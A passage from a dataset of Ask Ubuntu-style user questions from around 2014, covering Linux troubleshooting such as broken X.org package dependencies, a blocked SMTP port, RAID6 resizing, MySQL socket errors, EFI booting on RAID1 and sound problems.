xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-fbdev [ amd64 ] < 1:0.4.3+git20120801.2edaad4a-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-intel [ amd64 ] < 2:2.99.906+git20131213.f350a136-0ubuntu0sarvatt~quantal > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-neomagic [ amd64 ] < 1:1.2.7+git20120912.bc78be1c-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-nouveau [ amd64 ] < 1:1.0.9+git20130730.300c5a32-0ubuntu0sarvatt~quantal > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-s3 [ amd64 ] < 1:0.6.5+git20120912.92d10d5d-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-savage [ amd64 ] < 1:2.3.6+git20120801.3d181030-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-siliconmotion [ amd64 ] < 1:1.7.7+git20120801.2beb25bd-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-sis [ amd64 ] < 1:0.10.7+git20120912.339fb3bc-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-sisusb [ amd64 ] < 1:0.9.6+git20120801.894814fe-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-trident [ amd64 ] < 1:1.3.6+git20120801.3098fe71-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-vesa [ amd64 ] < 1:2.3.2+git20120912.7aafaf56-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-ati : amd64 depends on xserver-xorg-video-r128 [ amd64 ] < 6.9.1+git20130104.24f28a78-0ubuntu0sarvatt~quantal > ( x11 ) broken xserver-xorg-video-ati : amd64 depends on xserver-xorg-video-mach64 [ amd64 ] < 6.9.4+git20130104.80e62cc1-0ubuntu0sarvatt~quantal > ( x11 ) broken xserver-xorg-video-mach64 : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-trident : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-input-wacom : amd64 depends on xorg-input-abi-19 [ amd64 ] < none > ( none ) broken xserver-xorg-input-synaptics : amd64 depends on xorg-input-abi-19 [ amd64 ] < none > ( none ) broken libxi6 : amd64 breaks on xserver-xorg-core [ amd64 ] < 2:1.13.4~git20130508+server-1.13-branch.10c42f57-0ubuntu0ricotz~quantal - > 2:1.14.5-1ubuntu2~saucy1 > ( x11 ) ( < 2:1.14 ) broken xserver-xorg-video-ati : amd64 depends on xserver-xorg-video-mach64 [ amd64 ] < 6.9.4+git20130104.80e62cc1-0ubuntu0sarvatt~quantal > ( x11 ) broken xserver-xorg-video-trident : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-sis : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-siliconmotion : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-savage : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-intel : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-r128 : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-vesa : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-s3 : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-fbdev : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-nouveau : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-neomagic : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-sisusb : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-ati [ amd64 ] < 1:7.1.99+git20130730.6a278369-0ubuntu0sarvatt~quantal - > 1:7.2.0-0ubuntu10 > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-fbdev [ amd64 ] < 1:0.4.3+git20120801.2edaad4a-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-intel [ amd64 ] < 2:2.99.906+git20131213.f350a136-0ubuntu0sarvatt~quantal > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-neomagic [ amd64 ] < 1:1.2.7+git20120912.bc78be1c-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-nouveau [ amd64 ] < 1:1.0.9+git20130730.300c5a32-0ubuntu0sarvatt~quantal > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-s3 [ amd64 ] < 1:0.6.5+git20120912.92d10d5d-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-savage [ amd64 ] < 1:2.3.6+git20120801.3d181030-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-siliconmotion [ amd64 ] < 1:1.7.7+git20120801.2beb25bd-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-sis [ amd64 ] < 1:0.10.7+git20120912.339fb3bc-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-sisusb [ amd64 ] < 1:0.9.6+git20120801.894814fe-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-trident [ amd64 ] < 1:1.3.6+git20120801.3098fe71-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-vesa [ amd64 ] < 1:2.3.2+git20120912.7aafaf56-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-ati : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-ati [ amd64 ] < 1:7.1.99+git20130730.6a278369-0ubuntu0sarvatt~quantal - > 1:7.2.0-0ubuntu10 > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-fbdev [ amd64 ] < 1:0.4.3+git20120801.2edaad4a-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-intel [ amd64 ] < 2:2.99.906+git20131213.f350a136-0ubuntu0sarvatt~quantal > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-neomagic [ amd64 ] < 1:1.2.7+git20120912.bc78be1c-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-nouveau [ amd64 ] < 1:1.0.9+git20130730.300c5a32-0ubuntu0sarvatt~quantal > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-s3 [ amd64 ] < 1:0.6.5+git20120912.92d10d5d-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-savage [ amd64 ] < 1:2.3.6+git20120801.3d181030-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-siliconmotion [ amd64 ] < 1:1.7.7+git20120801.2beb25bd-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-sis [ amd64 ] < 1:0.10.7+git20120912.339fb3bc-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-sisusb [ amd64 ] < 1:0.9.6+git20120801.894814fe-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-trident [ amd64 ] < 1:1.3.6+git20120801.3098fe71-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-vesa [ amd64 ] < 1:2.3.2+git20120912.7aafaf56-0ubuntu0sarvatt > ( x11 ) when i was about to remove some of them with synaptic , i noticed that they were n't appearing when i searched for them , not even if i used apt-get to remove them .
439055	isp blocked port 25 because of spamming	main question : is it even possible to be be infected with a bot/spamming software on ubuntu ( or any other distro ) ? details : my isp blocked my port 25 ( and 465 ) for outgoing connections ( outbound connections , from home to remote server ) to smtp , so i ca n't use my business emails from home right now . their reasoning for blocking me is : `` because of you sending spam '' which i 'm not and they told me that if i 'm not sending then my os is probably infected ... i could use a comprehensive list of tools and guides to check the system ( ubuntu 13.10 14.04 64bit ) for any infiltrates/malware/rootkits . p.s . i also have windows 8.1 ( 64bit ) installed just because i also like to game on my home computer ... but that 's what i only do on windows ... when i have time ... wireless is off and even if it 's on it 's pass protected . scanning of windows did n't reveal anything nor should have since there 's windows and games installed there . i can connect to other ports for smtp but our server uses 25 and that can not change i also tested connecting to port 25 from windoze ( using thunderbird ) i use thunderbird for email client on ubuntu and tested a few others just to verify that it was not a misconfig of thunderbird . telneting also outputs connection timeout ... edit : my isp still refuses to unblock me ... maybe i 'll have to open up 587 on the server , since that is n't blocked at the moment ( i can still use gmail ) edit 2 : i guess today i was connected with another tech from my isp 's support and told me that there is n't a block from them ... i was furious ! ! ! i do n't know what was the previous tech doing ... maybe he is new and was reading from a script.. so i tested another isp via tethering from my phone and i successfully managed to send emails through port 25 . essentially i did n't change anything , only the isp . are they kidding me ? maybe the tech-support does n't know how to interpret what they looking on their screens for my account or could it be something else ? another step i took was to fully reset my router to it 's default settings and get another dynamic ip . still no connection to port 25 . i 'm planning to get a used router from some friend or something to test with another router just to be sure the problem lies with my isp . edit 3 : it 's been awhile since my last update to this question . i moved back to my old house ( which is in a different part of the country ) where i have the same internet provider . the same company ! ! my settings just work as expected . i can send emails just fine using port 25 . i bet the problem was with that nasty zte router that the isp hands out to new customers .
439056	why there is no nsenter in util-linux ?	i frequently using nsenter command for my purposes in my main system under arch linux . now i have to work on ubuntu to test my apps on it , but there is n't nsenter in util-linux . maybe it 's a separate package ? my kernel version is 3.11.0-18-generic upd . ok , i checked that version of util-linux in ubuntu is still much older than 2.23 . how can i install new version of package without any after problems on ubuntu ?
439059	no more diskspace after disk change , mdadm / raid6	i had a raid6 with 2tb disks , and have now replace all of them with 4tb disks . i pulled them out one at the time , after installing the new 4tb disk i added to /dev/md2 mdadm -- manage /dev/md2 -- add /dev/sdx after changed all 7 of them i tried to grow the raid mdadm -- grow /dev/md2 -- size=max but it only got me a little bit more disk , so the following resize2fs /dev/md2 gave me nearly nothing . $ cat /proc/mdstat personalities : [ linear ] [ multipath ] [ raid0 ] [ raid1 ] [ raid6 ] [ raid5 ] [ raid4 ] [ raid10 ] md2 : active raid6 sdc [ 6 ] sdi [ 5 ] sdd [ 4 ] sde [ 0 ] sdf [ 1 ] sdg [ 2 ] sdh [ 3 ] 10737417600 blocks level 6 , 64k chunk , algorithm 2 [ 7/7 ] [ uuuuuuu ] $ uname -a linux thenewserver 3.2.0-59-generic # 90-ubuntu smp tue jan 7 22:43:51 utc 2014 x86_64 x86_64 x86_64 gnu/linux $ smartctl -i /dev/sdh smartctl 5.41 2011-06-09 r3365 [ x86_64-linux-3.2.0-59-generic ] ( local build ) copyright ( c ) 2002-11 by bruce allen , http : //smartmontools.sourceforge.net === start of information section === device model : wdc wd40efrx-68wt0n0 serial number : wd-wcc4e0836493 lu wwn device id : 5 0014ee 2b4608df4 firmware version : 80.00a80 user capacity : 4,000,787,030,016 bytes [ 4.00 tb ] sector sizes : 512 bytes logical , 4096 bytes physical device is : not in smartctl database [ for details use : -p showall ] ata version is : 9 ata standard is : exact ata specification draft version not indicated local time is : tue mar 25 17:18:39 2014 cet smart support is : available - device has smart capability . smart support is : enabled $ df -h /dev/md2 9.9t 8.5t 867g 91 % /usr/local1 $ sudo mdadm -d /dev/md2 /dev/md2 : version : 0.90 creation time : fri jul 9 00:24:49 2010 raid level : raid6 array size : 10737417600 ( 10240.00 gib 10995.12 gb ) used dev size : 2147483520 ( 2048.00 gib 2199.02 gb ) raid devices : 7 total devices : 7 preferred minor : 2 persistence : superblock is persistent intent bitmap : internal update time : wed mar 26 12:10:05 2014 state : active active devices : 7 working devices : 7 failed devices : 0 spare devices : 0 layout : left-symmetric chunk size : 64k uuid : f0114df5:20f9dafe : ee14e2d4 : d0fe943c events : 0.10947206 number major minor raiddevice state 0 8 64 0 active sync /dev/sde 1 8 80 1 active sync /dev/sdf 2 8 96 2 active sync /dev/sdg 3 8 112 3 active sync /dev/sdh 4 8 48 4 active sync /dev/sdd 5 8 128 5 active sync /dev/sdi 6 8 32 6 active sync /dev/sdc i was expecting to see close to 20 tb here .
439060	unknown pgp key in my key ring	i have a key in my keyring and i do n't know how it got there . every other key i imported other than this one . how do keys make it into the keyring other than by me importing them ?
439063	automatically use usb0 network if available	how can i automatically use my usb0 network if it 's available ( in favour of using eth0 ) for any internet connectivity . currently , i plug in my phone to tether and then i have to run : sudo ip route change to default dev usb0 via 192.168.42.129 it would be great if i could set up a `` favour '' or priority some how ? because , frequently i forget to run this ( or it becomes tiresome running each time ) . occassionally , the usb will drop out also and i have to notice that it 's switched back to eth0 as the default . any thoughts to accomplish this ?
439064	installing ubuntu from usb on windows7	i trying to install ubuntu from usb on my windows 7 net-book . during installation i could n't create new partition . i could n't find free space as my + , - are non active . what should i do ? ? here by photo from my screen
439068	setting passwords on a live usb install of 12.04	with the impending demise of windows xp , i have taken this opportunity to try ubuntu ( via a bootable usb stick ) on a number of machines . everything looked fine but the lack of a password concerned me so i created a password protected account and that 's when the problems started . the system will no longer turn off ( other than by brute force by holding down the power button for 6 seconds ) . when i select the shutdown option from the upper right of the desktop it simply brings me to a login screen . this screen also has a shutdown option in the upper right but selecting this has no effect ( i suspect it just seemlessly brings me back to the same login screen , so there is no visible indication that it has had any effect ) . i 'm using version 12.04 and bootable usb stick was created via universal usb installer from pendrivelinux.com ( as suggested on ubuntu.com ) . if i also set a root password ( via sudo passwd root ) the problems are compounded in that it then becomes unbootable with the next boot failing with complaints about graphics cards and keyboard not being recognized . so , given my limited knowledge of linux i have no idea if these problems are specific to the ubuntu distribution or the way in which the uui has packaged it up for a live usb install , but if it is the former it would probably be worth looking into and if the latter then it might be worth not suggesting the use of uui if it basically does n't work . for now i shall move on to another distribution and see if it fares any better in creating a bootable usb stick . but if anyone has any suggestions for solutions to my apparent problems with ubuntu i may try it again later . thanks , usjes .
439074	error `` cant connect to mysql server through socket error ''	i 'm really having a hard time getting mysql to work . i keep getting this error message when trying to connect via the mysql client : ca n't connect to mysql server through socket `` /usr/var/mysqld/mysqld.sock '' ( 2 ) i ran find / mysqld.sock but got no results for this file . i tried reinstalling mysql-server & mysql-client to no avail . the weird thing is on my other server running mysql on ubuntu server 12.10 i do n't see this file either and yet it is listed in my.cnf and mysql runs fine . i 'm at an impasse . this is a new install with ubuntu server 13.10 & mysql 5.5 . here is my my.cnf file : [ mysqld ] # these next 5 log lines can be commented out once mysql server # is up and working properly . it otherwise slows down the server . # these next 5 log lines can be commented out once mysql server # is up and working properly . it otherwise slows down the server . log-error=/var/log/mysql/mysql-error.log log=/var/log/mysql/mysql.log long_query_time=1 log-slow-queries=/var/log/mysql/slow-queries.log log-queries-not-using-indexes [ client ] port = 3306 socket = /var/run/mysqld/mysqld.sock [ mysqld_safe ] socket = /var/run/mysqld/mysqld.sock nice = 0 [ mysqld ] user = mysql pid-file = /var/run/mysqld/mysqld.pid socket = /var/run/mysqld/mysqld.sock port = 3306 basedir = /usr datadir = /var/lib/mysql tmpdir = /tmp lc-messages-dir = /usr/share/mysql skip-external-locking bind-address = 172.16.178.7 key_buffer = 16m max_allowed_packet = 16m thread_stack = 192k thread_cache_size = 8 myisam-recover = backup query_cache_limit = 1m query_cache_size = 16m log_error = /var/log/mysql/error.log expire_logs_days = 10 max_binlog_size = 100m [ mysqldump ] quick quote-names max_allowed_packet = 16m [ mysql ] [ isamchk ] key_buffer = 16m ! includedir /etc/mysql/conf.d/ when i try starting the mysql server from the command line i get an error message of just : failed to start database : start : job failed to start '' any help would be most appreciated .
439076	headphones do not working on ubuntu 12.04	i 'm an user in ubuntu , and i have a problem with my headphone . the sound is good but it 's not working when i use headphones . i make sure that headphone is good to use . can anyone help me with information in this link : http : //www.alsa-project.org/db/ ? f=975e7e00ceef0e1fcc5dd3176e18a76f793cbac9
439080	unable to install jdk 6 after uninstalling jdk 7	want to install fresh jdk 6 for android development . before i had jdk 7 installed which i removed for fresh jdk 6 installation . tried using the webupd repository way , not of use , tried downloading the jdk from oracle and then unzipping it , not of use . i want to know if removing these listed packages will help ? java -version the program 'java ' can be found in the following packages : * default-jre * gcj-4.6-jre-headless * openjdk-6-jre-headless * gcj-4.5-jre-headless * openjdk-7-jre-headless try : sudo apt-get install < selected package > edit : in response to mrvaykadji : i tried doing the commands ... after i executed the sudo apt-get install -- -- - i encountered this error message at the end of log : update-alternatives : error : no alternatives for java . update-alternatives : using /usr/lib/jvm/java-6-oracle/jre/bin/controlpanel to provide /usr/bin/controlpanel ( controlpanel ) in auto mode . update-alternatives : error : can not stat file '/usr/lib/jvm/jdk-6u38-linux-x64-rpm.bin/java ' : not a directory dpkg : error processing oracle-java6-installer ( -- configure ) : subprocess installed post-installation script returned error exit status 2 no apport report written because maxreports is reached already errors were encountered while processing : openjdk-7-jre-headless openjdk-6-jre-headless default-jre-headless openjdk-6-jre default-jre openjdk-6-jdk default-jdk openjdk-7-jre oracle-java6-installer e : sub-process /usr/bin/dpkg returned an error code ( 1 )
439081	tried to upgrade to 14.04 . did not work . reinstalled 13.10 . all docs , pics , and music are gone	yeah the title pretty much says it all . after downloading trusty and rebooting , there was no screen . cursor , but no screen . re-installed 13.04 , and then updated to 13.10 , only to discover that all my pics , docs , and music files are gone . can i recover them ?
439088	how to change bluetooth device class	i am trying to change my advertised bluetooth device class from computer to phone , running ubuntu 12.04 . i downloaded the bluez sources and edited the main.conf file to change the line class = 0x000100 to something else . i used class = 0x0c025a then i ran make & & make install . i think that works ok because the /etc/bluetooth/main.conf file has been updated with my changes . now , the problem is that when i actually try to connect to a device hcitool cc < bdaddr > i see that i am still advertising myself using the class 0x000100 and not 0x0c025a . what am i missing here to get this changes to take effect ?
439089	share a ntfs folder with another ubuntu user	ubuntu 13.10/w7 dual boot i have a large folder of photos my pictures on a separate ntfs partition called data which i can access from windows & ubuntu . i want to make this folder accessible as read-only from my wife 's ubuntu user account . i 've tried changing permissions using nautilus but it does n't let me . there 's no end of eye-glazing advice on folder sharing online but i ca n't find anything that 's applicable , everything seems to assume the folder must be in home directory . is there a relatively simple way to achieve this ?
439090	server 13.10 , raid1 , lvm , efi booting on 2nd disk	i 've read a whole bunch of posts of trying to get your raid1 to boot up on the second disk if the first one failed . nothing has failed yet , but i 'm trying to test my setup . 2nd drive comes up with grub bash screen . 2 x wd red 3tb drives ( mdadm raid1 ) i have sda1 & sdb1 ( /boot/efi ) on their own partition and not in a raid1 . i 've read the /boot/efi ca n't be on raid1 . not sure if that 's true or not , but for now they are on their each own partition . maybe that could be my issue ? i 've read you can do it with /boot and but not with efi . that 's my main question , should i 'dd ' the /boot/efi partitions so they end up having the same uuid ? /dev/sda gpt fdisk ( gdisk ) version 0.8.7 partition table scan : mbr : protective bsd : not present apm : not present gpt : present found valid gpt with protective mbr ; using gpt . disk /dev/sda : 5860533168 sectors , 2.7 tib logical sector size : 512 bytes disk identifier ( guid ) : a0f00b38-0030-4607-82e7-313822903bf0 partition table holds up to 128 entries first usable sector is 34 , last usable sector is 5860533134 partitions will be aligned on 2048-sector boundaries total free space is 2925 sectors ( 1.4 mib ) number start ( sector ) end ( sector ) size code name 1 2048 249855 121.0 mib ef00 ubuntu1 2 249856 5860532223 2.7 tib fd00 raid1 /dev/sdb gpt fdisk ( gdisk ) version 0.8.7 partition table scan : mbr : protective bsd : not present apm : not present gpt : present found valid gpt with protective mbr ; using gpt . disk /dev/sdb : 5860533168 sectors , 2.7 tib logical sector size : 512 bytes disk identifier ( guid ) : a7e6c07d-839f-465d-b9cd-47e45cb62125 partition table holds up to 128 entries first usable sector is 34 , last usable sector is 5860533134 partitions will be aligned on 2048-sector boundaries total free space is 2925 sectors ( 1.4 mib ) number start ( sector ) end ( sector ) size code name 1 2048 249855 121.0 mib ef00 ubuntu2 2 249856 5860532223 2.7 tib fd00 raid2 blkid /dev/sda1 : uuid= '' c70d-a319 '' type= '' vfat '' /dev/sda2 : uuid= '' 8a62e7a5-e67d-5620-346d-19327a22ac27 '' uuid_sub= '' b1d472cf-cf30-2ddf-5dbf-0a709e179a90 '' label= '' homeserver:0 '' type= '' linux_raid_member '' /dev/sdb1 : uuid= '' c70f-2dd1 '' type= '' vfat '' /dev/sdb2 : uuid= '' 8a62e7a5-e67d-5620-346d-19327a22ac27 '' uuid_sub= '' 269b71a5-2faf-3fd5-a33f-2975acae100a '' label= '' homeserver:0 '' type= '' linux_raid_member '' /dev/md0 : uuid= '' pxo24d-8phw-gw8b-kzwc-5ccs-i4zq-lp43hv '' type= '' lvm2_member '' /dev/mapper/ubuntu-swap : uuid= '' ddccb365-e251-4ee1-a15c-b58295210885 '' type= '' swap '' /dev/mapper/ubuntu-root : label= '' root '' uuid= '' ebce6c83-50a7-448d-81cd-2a7a5585fa97 '' type= '' ext4 '' /dev/mapper/ubuntu-nas : label= '' nas '' uuid= '' c39a16f5-1644-4f6e-9005-1acf094220ca '' type= '' ext4 '' i 've done a fresh install of 13.10 sever and had to add grub2 to /dev/sdb1 mount | grep sda1 sudo umount /boot/efi sudo mount /dev/sdb1 /boot/efi sudo grub-install -- bootloader-id ubuntu2 /dev/sdb sudo umount /boot/efi sudo mount /boot/efi that installed grub and added another option to my efi boot mgr . when looking at my /etc/fstab , it can only mount /boot/efi from sda1 . if it fails over , how does fstab know to mount /boot/efi from sdb1 instead ? /etc/fstab # < file system > < mount point > < type > < options > < dump > < pass > /dev/mapper/ubuntu-root / ext4 errors=remount-ro 0 1 # /boot/efi was on /dev/sdb1 during installation uuid=c70d-a319 /boot/efi vfat defaults 0 1 /dev/mapper/ubuntu-nas /nas ext4 defaults , acl 0 2 /dev/mapper/ubuntu-swap none swap sw 0 0 edit : i 've dd sda1 to sdb1 and with the help of boot-repair , have 2 bootable grubs ( among hours of trying stuff ) . since i dd the partitions , the blkid uuid is the same . here is my boot repair info . http : //paste.ubuntu.com/7155022/ still , when system tries to boot degraded , it just loops on 'starting system degraded . ' have to use livecd and add the harddrive back to array before it can boot degraded .
439092	simple linux mailserver for sending `` notification '' emails	i am looking to set up a simple postfix server on ubuntu server 12.04 to use for `` notifications '' from simple equipment like ups devices . my company is moving to an external hosted provider for our exchange email services and this would allow simple , preferrably un-authenticated email messages to be sent from the linux box to outside email addresses . i have a postfix server installed and can use the webmin console gui to send test messages from the primary user account successfully , but so far i am still unable to send from any other `` device based '' system . pointers to a good tutorial or prior posts which my searches did not discover are welcome .
439094	do clustered pcs act as one computer ? or still as separate systems ?	while this is mostly a curiosity question , i am looking into this in the future ... if i were to buy the systems and switch ( and such ) and clustered them with ubuntu server , would it act as one pc with all the hardware together ? or just separate . for instance , if i were to install a desktop environment on the main machine and look at the specs , would the cpu cores , ram , and disks add up ? or would these systems still act independent with there own hardware . also , when these systems are connected through the switch , can more than one port be used if the system has more than on gigabit port ? i am asking this as i am already building on a small rack anyway and i am already building a system to render and as file storage . stupid question , i know .
439095	booting from lvm partition	i screwed up when i installed my machine awhile back and put the / partition ( including /boot ) into the lvm . while the machine will eventually boot , it wo n't boot non-interactively . for whatever reason i end up in the initramfs prompt . i do an ls /dev/mapper and eventually ( 10 minutes or so ) the correct lvm partition shows up and i type exit and the machine boots normally . any way to solve this without having to redo the whole disk ?
439100	lxpanel : show active window title & close/min-max/restore buttons	important edit : i have now found out that these plug-ins are possible , but do not exist . i submitted a request on the lxde sourceforge page here . they responded , saying they like the idea , but the implementation will take some time due to insufficient man-power . in short : i am trying to find a way of mimicking the unity 2d panel ( global menu not needed . many people said that openbox ca n't handle global menus , that i should use another window manager , but i do n't want/need the global menu . thanks . sorry for caps , needed to empathize that ) . in long : i have quite an old notebook . i tried installing ubuntu ( 12.04 wubi ) , that was too slow for me , but my friend recommended lubuntu , which i tried installing as a desktop environment by sudo apt-get install lubuntu-desktop . i now use it all the time , but i miss one thing - the unity panel which served as a top bar for the maximized windows . i 'm not on a very large screen , so space is valuable . i have quite a lot of indicators , so when i used the default bar , it was always full to the brim , with no space left for the window list . so i tried using the unity-2d-panel , but it has it 's minuses in lxde . it 's not very lightweight , it 's close/min-max/restore buttons are ugly because of a bug when using non-native themes ( non-ambiance or radiance themes ) , and i ca n't change much about it ( the theme , position , items , transparency ) , as i am used to in lxpanel ( for info i use it as the bottom panel along with the unity panel which is on the top ) . also , the menu does n't always disappear in applications , so the global menu becomes useless . update : unity-2d-panel also crashes a lot , and is n't omni-present ( present on all workspaces ) . so i want to go back to lxpanel , but i want to keep the integrated window bar . i tried googling , and i found this , but i do n't know how to use it , whether to use it , and it still lacks the buttons mentioned earlier . update : googling now finds this question on number 1 . i want to achieve something like this : the close/min-max/restore buttons indicators applet [ —— ] [ ———————— ] ___________________________________________________________ x↓↑ an example window title indicators ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ [ ————————————————————— ] the active window title the buttons with the title should ( optimally ) only show when the window is maximized . is there any way to do this ? i do n't need the global menu . thanks . this was my first question , so feel free to correct me if i messed anything up or posted a duplicate : ) ps : this question is more than a week here , and lacks an answer , so please , if you want an answer too , upvote the question . the question will be more visible ( higher chance of answering ) , and also it may give me the opportunity to give a bounty on this question . note : this should be possible . the built-in `` task bar ( window list ) '' plug-in in lxpanel actually has most of the functions needed ( that is showing the window title , maximizing , minimizing , restoring closing the window , but i am not sure if it can get the active window ) . so , this combined with maximus ( which i already use combined with unity-2d-panel ) , would be technically possible .
439101	vga screen is shifted left	i 've just built a new pc with a gigabyte e350n motherboard , asus vs197 16:9 monitor and ubuntu 13.10 . i 'm having a problem with the horizontal screen position , which on the maximum resolution ( 1366x768 ) is shifted so far to the left that the ubuntu launch bar can not be seen , and even using full horizontal position adjustment , it is still invisible . however , if i switch the user settings to the lower resolution ( 1280x720 ) , the screen is correctly positioned - but only for that user . it has to be set for each user , and the user logon screen is still way off the the left , so you can only see half the password box . i did a check using lspci which reported : vga compatible controller [ 0300 ] : advanced micro devices , inc. [ amd/ati ] wrestler [ radeon hd 6310 ] [ 1002:9802 ] xrandr results are : screen 0 : minimum 320 x 200 , current 1280 x 720 , maximum 8192 x 8192 hdmi-0 disconnected ( normal left inverted right x axis y axis ) vga-0 connected primary 1280x720+0+0 ( normal left inverted right x axis y axis ) 410mm x 230mm 1280x720 60.0*+ 1366x768 59.8 + 1024x768 75.1 70.1 60.0 832x624 74.6 800x600 72.2 75.0 60.3 640x480 75.0 72.8 66.7 60.0 720x400 70.1 i 'm very much not a linux expert , but it looks to me like possibly there is a driver problem , or perhaps the wrestler chipset is not yet supported . i would be most grateful for your advice .
439102	installing ubuntu alongside windows xp	i am new to ubuntu and am seeking to set up a dual boot of ubuntu 13.10 alongside my windows xp installation . i have downloaded the 13.10 iso file and burnt to dvd . ubuntu runs fine in 'try me ' mode but when i try to install i ca n't get beyond the second dialogue box : installation type . /dev/sda appears in the `` device for boot loader '' field but none of the other buttons in the dialogue box ( + , - , change , var partition table , revert ) appear active . i ca n't seem to be able to make any further progress . can you help ?
439107	i can not get ubuntu to install on my laptop	when i try to load ubuntu from a flash drive it does not find the boot-able drive . i have tried a disk and it works , but i want to boot from my flash drive .
439108	ubuntu does n't recognize my ethernet card or wifi card fresh install	just loaded ubuntu and ca n't connect to the internet . i believe it has to do with not having drivers for my ethernet port and wifi adapter . how do i get compatible ones because the drivers i have are only compatible with windows . thanks
439110	how do i install ubuntu on my dell latitude 10 tablet with windows 8 ( not pro ) ?	intel® atom™ processor z2760 1.8ghz with intel® burst technology , 1.5ghz hfm , 600mhz lfm windows 8 , 32-bit , no media , english ports : full-size usb 2.0 , full-size sd memory card reader , docking connector , stereo headphone/ microphone combo jack
439111	crackling and sound interruptions - speaker/headphone switching	continuous crackling from moment ubuntu starts up . when playing sound gives interruptions . i did n't experience any sound problem in windows before i installed ubuntu ( ubuntu is great btw ) . continuous switching between speakers and headphones in sound settings . crackling continues when pulseaudio turned off . difficulty adjusting sound levels in alsamixer . same problem under all linux os . i tried editing sample rate in daemon.conf or tsched=0 in default.pa , checking archlinux site and some basic bug solutions for alsa , reinstalling different linux os , but no newbie luck.. there 's a short video i made of the problem : https : //www.facebook.com/photo.php ? v=486149771507522 & l=6160322189117296858 see also more info on my system on : alsa information script v 0.4.63 ( for linux , kernel , alsa sound info at ) http : //www.alsa-project.org/db/ ? f=050330a52b4870e7ed9d72af30adb1a4987e7dcc and a bug report i posted at http : //www.bugs.launchpad.net/ubuntu/+source/alsa-driver/+bug/1294830 : hp compaq dc7600 small form factor , realtek alc260 , green line out , rear underruns , dropouts or crackling sound . i received feedback on this but it 's too technical for me . thx for any advice , bless
